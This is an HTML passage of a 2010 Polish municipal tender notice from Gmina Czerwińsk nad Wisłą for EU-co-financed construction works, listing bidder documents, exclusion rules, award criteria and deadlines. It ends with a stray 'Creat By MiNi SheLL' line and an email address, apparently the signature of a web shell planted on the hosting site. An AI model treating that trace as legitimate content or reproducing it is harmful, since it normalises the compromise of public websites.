<ul class="kh_indent_1"><li><p>wykonawca zobowiązany jest wykazać, że jest  ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż   3 000 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz oświadczeń lub dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu:

7.1.	W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu-Załącznik Nr 2  do SIWZ należy przedłożyć:

1) wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - Załącznik Nr 4 do SIWZ

2) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - Załącznik Nr  5 do SIWZ,

3)Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają  
 wymagane uprawnienia budowlane zgodnie z Ustawą  z dnia 7 lipca 1994 r. Prawo budowlane Dz. U.  z 2006r. Nr 156, poz. 1118 z późn. zm.

4) opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej              z przedmiotem zamówienia. 

7.2.	W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy należy przedłożyć:
1)	oświadczenie o braku podstaw do wykluczenia - Załącznik Nr 6  do SIWZ
2)	aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy  wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych  oświadczenie w zakresie art.24 ust.1 pkt 2 ustawy-Załącznik Nr 7 do SIWZ.

7.3.	Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art.22 ust.1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy,                   a podmioty te będą brały udział w realizacji części zamówienia, Wykonawca zobowiązany jest złożyć dla każdego z tych podmiotów dokumenty wymienione w pkt 7.2 ppkt 1) - 2) oraz pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

Wymagane dokumenty należy złożyć w oryginale lub kopii poświadczonej za zgodność z oryginałem  przez Wykonawcę lub osobę/osoby uprawnione do podpisania oferty. Dokumenty złożone w postaci kopii muszą być opatrzone klauzulą -ZA ZGODNOŚĆ Z ORYGINAŁEM- i poświadczone za zgodność z oryginałem na każdej stronie.

7.4.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa dokumenty zgodnie z § 4 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2009 r. Nr 226, poz. 1817).

1)	Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej jest zobowiązany złożyć wszystkie dokumenty zgodnie z SIWZ (na wzorach stanowiących załączniki do niniejszej specyfikacji) w języku polskim, zamiast dokumentu wymienionego w rozdz. VII, pkt 7.2, ppkt 2) Wykonawca składa dokument wystawiony w kraju, w którym  ma siedzibę lub miejsce zamieszkania, potwierdzający że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
2)	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w pkt 1) zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wykonawca, którego ofertę wybrano jako najkorzystniejszą będzie zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach podanych we wzorze umowy stanowiącym Załącznik Nr 8 do SIWZ. 
2. Wszelkie zmiany organizacyjne stron powodować będą aneks do umowy.
3. Zamawiający dopuszcza  możliwość dokonania zmian postanowień umowy w stosunku do treści oferty, na podstawie której  dokonano wyboru Wykonawcy w okolicznościach, których nie można było przewidzieć  w chwili zawarcia umowy, a w szczególności: 
1) wprowadzenia urzędowej zmiany stawki podatku VAT, co spowoduje zmianę wynagrodzenia brutto Wykonawcy, 
2) konieczności wprowadzenia wszelkich zmian z inicjatywy podmiotu współfinansującego zadanie.
4.   Ww. zmiany umowy mogą być dokonane wyłącznie w formie pisemnego aneksu podpisanego przez obie strony, pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ugczerwinsk.bip.org.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Czerwińsk nad Wisłą, ul. Wł. Jagiełły 16, 09-150 Czerwińsk nad Wisłą.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2010 godzina 10:00, miejsce: Urząd Gminy Czerwińsk nad Wisłą, ul. Wł. Jagiełły 16, 09-150 Czerwińsk nad Wisłą, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską  w ramach Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007-2013, priorytet VII - Tworzenie i poprawa warunków rozwoju kapitału ludzkiego Działanie 7.2 Infrastruktura służąca edukacji.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com